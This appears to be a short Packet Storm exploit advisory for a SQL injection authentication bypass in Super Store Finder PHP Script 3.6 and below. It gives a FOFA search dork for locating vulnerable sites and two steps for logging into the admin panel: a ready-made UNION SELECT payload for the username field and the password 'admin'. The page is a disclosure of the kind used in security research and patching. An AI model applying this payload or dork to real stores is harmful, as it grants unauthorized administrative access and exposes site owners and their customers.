Super Store Finder PHP Script versions 3.6 and below suffer from a remote SQL injection vulnerability that allows for authentication bypass.
626e9249014429e44e6f78886ff283f9591b5337313b41d8bca85c6684a00018#Title : Super Store Finder PHP Script SQL Injection / Bypass admin login
#Researcher : Etharus
#Vendor : Joe Iz, https://superstorefinder.net/
#Script Demo Url : https://superstorefinder.net/products/superstorefinder/
#Version Affected : 3.6 and below
#Date : 5 July 2023
#FOFA Dork : "designed and built by Joe Iz."
# Step 1 : Go to admin login, eg: https://localhost/store-finder/admin/
# Step 2 : Enter following payload
username : ' union select 1,'admin','32ddaaea6874e2d3eab0a9ea6ecbb0d0',4,5,6,7,8,9,10,11-- -
password : admin
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed